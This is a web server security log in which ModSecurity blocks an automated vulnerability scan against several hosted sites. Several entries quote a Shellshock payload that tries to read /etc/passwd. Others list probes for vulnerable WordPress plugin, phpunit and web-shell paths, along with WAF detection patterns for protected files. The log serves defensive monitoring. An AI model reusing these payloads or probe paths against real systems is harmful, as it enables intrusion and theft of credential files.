[Tue May 26 12:51:14.384641 2026] [security2:error] [pid 448967:tid 449151] [client 23.94.40.119:35104] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/test.cgi"] [unique_id "ahVJ6uXLPuWQsfM-UVS_cwAAADY"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.384933 2026] [security2:error] [pid 448967:tid 449143] [client 23.94.40.119:35052] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/status"] [unique_id "ahVJ6uXLPuWQsfM-UVS_dQAAAC4"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.384923 2026] [security2:error] [pid 448967:tid 449116] [client 23.94.40.119:35082] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/test.cgi"] [unique_id "ahVJ6uXLPuWQsfM-UVS_dAAAABM"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.385189 2026] [security2:error] [pid 448967:tid 449221] [client 23.94.40.119:35058] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/stats"] [unique_id "ahVJ6uXLPuWQsfM-UVS_dgAAAHw"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.385193 2026] [security2:error] [pid 448967:tid 449146] [client 23.94.40.119:35064] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/test"] [unique_id "ahVJ6uXLPuWQsfM-UVS_dwAAADE"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.385792 2026] [security2:error] [pid 448967:tid 449160] [client 23.94.40.119:35086] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/debug.cgi"] [unique_id "ahVJ6uXLPuWQsfM-UVS_eAAAAD8"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.389569 2026] [security2:error] [pid 448967:tid 449172] [client 23.94.40.119:35110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/backupmgt/pre_connect_check.php"] [unique_id "ahVJ6uXLPuWQsfM-UVS_eQAAAEs"]
[Tue May 26 12:51:14.391785 2026] [security2:error] [pid 448967:tid 449137] [client 23.94.40.119:35122] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/webadmin/auth/verification.php"] [unique_id "ahVJ6uXLPuWQsfM-UVS_egAAACg"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in/webadmin/start/
[Tue May 26 12:51:14.393705 2026] [security2:error] [pid 448967:tid 449126] [client 23.94.40.119:35106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"] [unique_id "ahVJ6uXLPuWQsfM-UVS_ewAAAB0"]
[Tue May 26 12:51:14.643823 2026] [security2:error] [pid 448967:tid 449182] [client 23.94.40.119:35128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVJ6uXLPuWQsfM-UVS_hQAAAFU"]
[Tue May 26 12:51:14.775395 2026] [security2:error] [pid 448967:tid 449161] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ6uXLPuWQsfM-UVS_cQAAAEA"]
[Tue May 26 12:51:15.093855 2026] [security2:error] [pid 448967:tid 449212] [client 23.94.40.119:35172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVJ6-XLPuWQsfM-UVS_nAAAAHM"]
[Tue May 26 12:51:15.356099 2026] [security2:error] [pid 448967:tid 449201] [client 23.94.40.119:35192] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "264"] [id "900296"] [msg "Gravity Forms Unsecured Upload Attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ6-XLPuWQsfM-UVS_owAAAGg"]
[Tue May 26 12:51:15.617420 2026] [security2:error] [pid 448967:tid 449193] [client 23.94.40.119:35198] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "264"] [id "900296"] [msg "Gravity Forms Unsecured Upload Attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ6-XLPuWQsfM-UVS_qgAAAGA"]
[Tue May 26 12:51:15.924482 2026] [security2:error] [pid 448967:tid 449211] [client 23.94.40.119:35202] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgibin/webproc"] [unique_id "ahVJ6-XLPuWQsfM-UVS_sQAAAHI"]
[Tue May 26 12:51:16.227637 2026] [security2:error] [pid 448967:tid 449178] [client 23.94.40.119:35230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/bj-lazy-load/thumb.php"] [unique_id "ahVJ7OXLPuWQsfM-UVS_uwAAAFE"]
[Tue May 26 12:51:16.481873 2026] [security2:error] [pid 448967:tid 449107] [client 23.94.40.119:35232] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVJ7OXLPuWQsfM-UVS_xAAAAAo"]
[Tue May 26 12:51:16.496153 2026] [security2:error] [pid 448967:tid 449168] [client 23.94.40.119:35234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/bj-lazy-load/thumb.php"] [unique_id "ahVJ7OXLPuWQsfM-UVS_xgAAAEc"]
[Tue May 26 12:51:16.641207 2026] [security2:error] [pid 448967:tid 449120] [client 23.94.40.119:35244] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVJ7OXLPuWQsfM-UVS_zwAAABc"]
[Tue May 26 12:51:16.740403 2026] [security2:error] [pid 448967:tid 449180] [client 23.94.40.119:35250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/showbizpro/temp/update_extract/p1JnL.php"] [unique_id "ahVJ7OXLPuWQsfM-UVS_2QAAAFM"]
[Tue May 26 12:51:17.008166 2026] [security2:error] [pid 448967:tid 449123] [client 14.236.37.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVJ7OXLPuWQsfM-UVS_1QAAABo"]
[Tue May 26 12:51:17.110143 2026] [security2:error] [pid 448967:tid 449117] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ7OXLPuWQsfM-UVS_0gAAABQ"]
[Tue May 26 12:51:17.511160 2026] [security2:error] [pid 448967:tid 449184] [client 23.94.40.119:35282] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/wsecure/wsecure-config.php"] [unique_id "ahVJ7eXLPuWQsfM-UVS_8gAAAFc"]
[Tue May 26 12:51:17.527288 2026] [security2:error] [pid 448967:tid 449171] [client 23.94.40.119:35290] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/mainwp-vuln/readme.txt"] [unique_id "ahVJ7eXLPuWQsfM-UVS_9AAAAEo"]
[Tue May 26 12:51:17.528519 2026] [security2:error] [pid 448967:tid 449155] [client 195.178.110.34:59774] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVJ7eXLPuWQsfM-UVS_8wAAADo"]
[Tue May 26 12:51:17.743414 2026] [autoindex:error] [pid 448967:tid 449210] [client 147.185.132.120:0] AH01276: Cannot serve directory /home1/taote1zo/moremi.taotechservices.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 12:51:17.846580 2026] [security2:error] [pid 448967:tid 449191] [client 23.94.40.119:43092] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVJ7eXLPuWQsfM-UVTAAgAAAF4"]
[Tue May 26 12:51:17.882045 2026] [security2:error] [pid 448967:tid 449138] [client 23.94.40.119:43100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/wp-mobile-detector/resize.php"] [unique_id "ahVJ7eXLPuWQsfM-UVTABgAAACk"]
[Tue May 26 12:51:17.967321 2026] [security2:error] [pid 448967:tid 449107] [client 23.94.40.119:43114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/boardDataWW.php"] [unique_id "ahVJ7eXLPuWQsfM-UVTABwAAAAo"]
[Tue May 26 12:51:18.183533 2026] [security2:error] [pid 448967:tid 449109] [client 23.94.40.119:43122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/uploads/post_files/3efh8e0rmokkjbqeufa2p5ic1rs.php"] [unique_id "ahVJ7uXLPuWQsfM-UVTAEAAAAAw"]
[Tue May 26 12:51:18.475445 2026] [security2:error] [pid 448967:tid 449203] [client 23.94.40.119:43132] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVJ7uXLPuWQsfM-UVTAGwAAAGo"]
[Tue May 26 12:51:18.630326 2026] [security2:error] [pid 448967:tid 449163] [client 23.94.40.119:43176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/__debugging_center_utils___.php"] [unique_id "ahVJ7uXLPuWQsfM-UVTAHwAAAEI"]
[Tue May 26 12:51:18.689269 2026] [security2:error] [pid 448967:tid 449114] [client 23.94.40.119:43186] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"] [unique_id "ahVJ7uXLPuWQsfM-UVTAJgAAABE"]
[Tue May 26 12:51:18.750492 2026] [security2:error] [pid 448967:tid 449211] [client 23.94.40.119:43188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/uploads/user_uploads/3efh8e0rmokkjbqeufa2p5ic1rs.php"] [unique_id "ahVJ7uXLPuWQsfM-UVTAKQAAAHI"]
[Tue May 26 12:51:18.890853 2026] [security2:error] [pid 448967:tid 449156] [client 23.94.40.119:43194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/__debugging_center_utils___.php"] [unique_id "ahVJ7uXLPuWQsfM-UVTALQAAADs"]
[Tue May 26 12:51:20.502500 2026] [security2:error] [pid 448967:tid 449183] [client 91.226.164.87:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ8OXLPuWQsfM-UVTAWAAAAFY"]
[Tue May 26 12:51:20.536929 2026] [security2:error] [pid 448967:tid 449199] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ8OXLPuWQsfM-UVTAXgAAAGY"]
[Tue May 26 12:51:21.310732 2026] [security2:error] [pid 448967:tid 449174] [client 157.20.138.61:53774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ8eXLPuWQsfM-UVTAfgAAAE0"]
[Tue May 26 12:51:21.310844 2026] [security2:error] [pid 448967:tid 449174] [client 157.20.138.61:53774] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ8eXLPuWQsfM-UVTAfgAAAE0"]
[Tue May 26 12:51:22.098049 2026] [security2:error] [pid 448967:tid 449198] [client 23.94.40.119:43250] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/invoker/EJBInvokerServlet/"] [unique_id "ahVJ8uXLPuWQsfM-UVTAlAAAAGU"]
[Tue May 26 12:51:23.336147 2026] [security2:error] [pid 448967:tid 449097] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ8uXLPuWQsfM-UVTAqQAAAAA"]
[Tue May 26 12:51:25.092546 2026] [security2:error] [pid 448967:tid 449222] [client 23.94.40.119:43330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/maint/modules/home/index.php"] [unique_id "ahVJ9eXLPuWQsfM-UVTA4QAAAH0"]
[Tue May 26 12:51:25.609271 2026] [security2:error] [pid 448967:tid 449153] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ9eXLPuWQsfM-UVTA5AAAADg"]
[Tue May 26 12:51:25.940420 2026] [cgid:error] [pid 448967:tid 449201] [client 23.94.40.119:43346] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/DownloadCfg: script not found or unable to stat
[Tue May 26 12:51:26.409164 2026] [security2:error] [pid 448967:tid 449157] [client 23.94.40.119:43364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/3EFh8CzLwoO1801BMIgyzRbHxfd.php%5Cx0A"] [unique_id "ahVJ9uXLPuWQsfM-UVTBAQAAADw"]
[Tue May 26 12:51:28.009715 2026] [security2:error] [pid 448967:tid 449218] [client 23.94.40.119:46848] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/|/\\\\.(?:history|bash_history|sh_history)$)" at REQUEST_HEADERS:Content-Type. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "218"] [id "390719"] [rev "6"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ-OXLPuWQsfM-UVTBMAAAAHk"]
[Tue May 26 12:51:28.643090 2026] [security2:error] [pid 448967:tid 449197] [client 23.94.40.119:46890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/clients/editclient.php"] [unique_id "ahVJ-OXLPuWQsfM-UVTBTAAAAGQ"]
[Tue May 26 12:51:28.901021 2026] [security2:error] [pid 448967:tid 449125] [client 23.94.40.119:46940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/logos_clients/3EFh8G5qcEVAgXekljtZaEcwjKM.php"] [unique_id "ahVJ-OXLPuWQsfM-UVTBUAAAABw"]
[Tue May 26 12:51:28.910553 2026] [security2:error] [pid 448967:tid 449123] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ-OXLPuWQsfM-UVTBRgAAABo"]
[Tue May 26 12:51:29.640310 2026] [http2:info] [pid 461618:tid 461618] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 12:51:31.820198 2026] [security2:error] [pid 461618:tid 461842] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ-1yiSlSCHr1fdr2ZzQAAAOM"]
[Tue May 26 12:51:31.961635 2026] [security2:error] [pid 461618:tid 461861] [client 157.20.138.61:54141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ-1yiSlSCHr1fdr2Z5gAAAPY"]
[Tue May 26 12:51:31.961785 2026] [security2:error] [pid 461618:tid 461861] [client 157.20.138.61:54141] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ-1yiSlSCHr1fdr2Z5gAAAPY"]
[Tue May 26 12:51:32.660568 2026] [security2:error] [pid 461618:tid 461790] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ_FyiSlSCHr1fdr2Z8gAAAK8"]
[Tue May 26 12:51:33.144988 2026] [security2:error] [pid 461618:tid 461811] [client 23.94.40.119:47042] ModSecurity: Warning. Matched phrase "Firefox/7.0" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVJ_VyiSlSCHr1fdr2aAgAAAMQ"]
[Tue May 26 12:51:34.571169 2026] [security2:error] [pid 461618:tid 461650] [remote 45.250.255.226:48974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVJ_lyiSlSCHr1fdr2aLAAA-R8"]
[Tue May 26 12:51:34.614565 2026] [security2:error] [pid 461618:tid 461762] [client 23.94.40.119:47050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVJ_lyiSlSCHr1fdr2aPAAAAJM"]
[Tue May 26 12:51:34.922571 2026] [security2:error] [pid 461618:tid 461813] [client 23.94.40.119:47060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/vendor/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVJ_lyiSlSCHr1fdr2aQQAAAMY"]
